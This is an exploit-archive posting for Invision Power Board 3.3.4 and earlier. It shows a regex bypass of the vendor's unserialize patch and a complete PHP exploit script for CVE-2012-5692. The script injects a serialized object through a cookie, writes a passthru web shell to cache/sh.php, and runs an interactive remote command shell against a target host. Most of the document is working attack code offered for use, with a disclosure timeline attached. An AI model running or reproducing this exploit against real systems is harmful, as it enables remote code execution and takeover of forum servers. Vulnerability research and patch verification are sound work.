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Invision Power Board 3.3.4 Unserialize REGEX Bypass

Invision Power Board 3.3.4 Unserialize REGEX Bypass
Posted Nov 8, 2012
Authored by webDEViL

Invision Power Board versions 3.3.4 and below unserialize REGEX bypass exploit.

tags | exploit, bypass
SHA-256 | ad210687f42887baff2de52193e65980c72d969f3690120bb695a84ed8356c42

Invision Power Board 3.3.4 Unserialize REGEX Bypass

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<?php
/*

So this is the patch that sanitizes,
static public function safeUnserialize( $serialized )
{
// unserialize will return false for object declared with small cap o
// as well as if there is any ws between O and :
if ( is_string( $serialized ) && strpos( $serialized, "\0" ) === false )
{
if ( strpos( $serialized, 'O:' ) === false )
{
// the easy case, nothing to worry about
// let unserialize do the job
return @unserialize( $serialized );
}
else if ( ! preg_match('/(^|;|{|})O:[0-9]+:"/', $serialized ) )
{
// in case we did have a string with O: in it,
// but it was not a true serialized object
return @unserialize( $serialized );
}
}

return false;
}


And this is what bypasses it ( By @i0n1c )
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');

Which makes this an IPB 0day. lulz!

- webDEViL

*/

/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: http://www.invisionpower.com/

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php

4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }

The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.

[-] Disclosure timeline:

[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);

function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}

print "\n+-----------------------------------+";
print "\n| Invision Power Board 0day Exploit |";
print "\n+-----------------------------------+\n";

if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}

list($host, $path) = array($argv[1], $argv[2]);

$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";

$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';

class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
# Super bypass by @i0n1c
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';

$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";

http_send($host, $packet);

$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");

while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
?>

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